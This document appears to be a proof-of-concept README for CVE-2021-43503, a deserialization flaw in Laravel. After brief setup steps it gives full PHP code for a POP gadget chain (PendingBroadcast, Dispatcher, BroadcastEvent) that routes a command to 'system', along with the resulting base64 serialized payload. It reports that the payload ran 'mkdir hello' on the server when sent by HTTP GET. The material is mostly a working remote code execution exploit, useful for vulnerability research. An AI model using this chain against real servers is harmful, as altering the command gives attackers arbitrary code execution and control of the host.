This is Abount CVE-2021-43503.
- PHP >= 8.0
- Composer
-
Startup service
composer install cp .env.example .env php artisan key:generate php artisan serve # it will listening 8000 port in localhost
-
encode POP chain
<?php namespace Illuminate\Contracts\Queue{ interface ShouldQueue { // } } namespace Illuminate\Bus{ class Dispatcher{ protected $container; protected $pipeline; protected $pipes = []; protected $handlers = []; protected $queueResolver; function __construct() { $this->queueResolver = "system"; } } } namespace Illuminate\Broadcasting{ use Illuminate\Contracts\Queue\ShouldQueue; class BroadcastEvent implements ShouldQueue { function __construct() { } } class PendingBroadcast{ protected $events; protected $event; function __construct() { $this->event = new BroadcastEvent(); $this->event->connection = "mkdir hello"; $this->events = new \Illuminate\Bus\Dispatcher(); } } } namespace{ $a = new \Illuminate\Broadcasting\PendingBroadcast(); echo base64_encode(serialize($a)); }
It will be output above:
Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MjU6IklsbHVtaW5hdGVcQnVzXERpc3BhdGNoZXIiOjU6e3M6MTI6IgAqAGNvbnRhaW5lciI7TjtzOjExOiIAKgBwaXBlbGluZSI7TjtzOjg6IgAqAHBpcGVzIjthOjA6e31zOjExOiIAKgBoYW5kbGVycyI7YTowOnt9czoxNjoiACoAcXVldWVSZXNvbHZlciI7czo2OiJzeXN0ZW0iO31zOjg6IgAqAGV2ZW50IjtPOjM4OiJJbGx1bWluYXRlXEJyb2FkY2FzdGluZ1xCcm9hZGNhc3RFdmVudCI6MTp7czoxMDoiY29ubmVjdGlvbiI7czoxMToibWtkaXIgaGVsbG8iO319
-
Test from GET of HTTP:
It did successfully create
hello/
inpublic/